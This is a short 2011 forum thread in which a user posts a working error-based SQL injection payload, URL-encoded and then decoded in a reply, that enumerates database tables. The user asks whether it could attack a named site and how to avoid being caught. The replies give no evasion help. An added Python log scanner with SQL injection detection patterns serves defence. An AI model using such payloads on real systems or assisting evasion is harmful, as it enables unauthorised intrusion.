Topic: SQL injection question

Santa
SQL injection question
« on: November 06, 2011, 06:43:30 PM »
OK guys, I have a question: will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website such as (www.evilzone.org)?
If so, what security measures should I take so I don't get caught doing this, and what should I download to keep me safe from anything else?
« Last Edit: November 06, 2011, 06:45:57 PM by Factionwars »

ca0s
Re: SQL injection question
« Reply #1 on: November 06, 2011, 06:54:12 PM »
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing any website, with its corresponding logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use Google.
Also
Code:
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.
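
The reply above notes that a request like this is logged like any other. As an added example from the defender's side (not part of the original thread), this sketch URL-decodes the query string of each access-log line and flags the constructs visible in the posted request; the combined log format, the addresses and timestamps, and the indicator and function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). The first request
# string is the one quoted in the thread; addresses and timestamps are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Nov/2011:18:43:30 +0000] "GET /index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [06/Nov/2011:18:44:02 +0000] "GET /index.php?lvl=categories&id=453 HTTP/1.1" 200 4987',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Indicator name -> pattern, matched against the decoded, normalised query string.
INDICATORS = {
    "information_schema": re.compile(r"information_schema\."),
    "rand_group_by": re.compile(r"floor\(rand\(\d*\)\*2\).*group by"),
    "nested_select": re.compile(r"\(select .*\(select "),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}

def normalise(target):
    """URL-decode the query string and strip quoting/case/spacing differences."""
    query = target.partition("?")[2]
    decoded = unquote_plus(query).lower().replace("`", "")
    return re.sub(r"\s+", " ", decoded)

def scan_line(line):
    """Return the sorted indicator names found in one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = normalise(m.group(1))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))

def scan(lines):
    """Map source address -> indicators for every line that matched anything."""
    hits = {}
    for line in lines:
        found = scan_line(line)
        if found:
            hits.setdefault(line.split()[0], set()).update(found)
    return hits

if __name__ == "__main__":
    for src, found in scan(SAMPLE_LOG).items():
        print(src, sorted(found))
```

Signature matching like this is a triage aid for logs; it does not replace parameterised queries in the application itself.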

Santa
Re: SQL injection question
« Reply #2 on: November 06, 2011, 06:59:50 PM »
No, I don't, but I want to learn. I will check out Ande's post when I have time.
« Last Edit: November 06, 2011, 07:00:23 PM by Santa »

 


